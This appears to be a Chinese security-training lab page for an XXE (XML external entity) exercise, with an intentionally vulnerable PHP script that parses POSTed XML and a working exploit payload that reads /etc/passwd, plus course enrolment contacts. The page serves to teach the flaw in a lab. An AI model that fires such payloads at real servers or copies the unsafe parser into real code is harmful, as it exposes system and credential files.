XXE漏洞一

本页面漏洞需要开启docker容器并开启apache服务,默认已经开启,如果有问题请联系管理员必火,微信:bihuoceo
接收端PHP源码如下:
<?php
    header("content-type:text/html;charset=utf-8");
    date_default_timezone_set("PRC");
    $data =$_POST['xml'];
    $xml = simplexml_load_string($data);
    echo date('Y-m-d H:i:s',time());
    echo $xml->login;
?>
漏洞利用代码如下:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bihuo><login>&xxe;</login></bihuo>

必火安全学院

报名微信:nvhack



© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2   网络安全培训、企业合作、院校合作: 15320004362(手机同微信)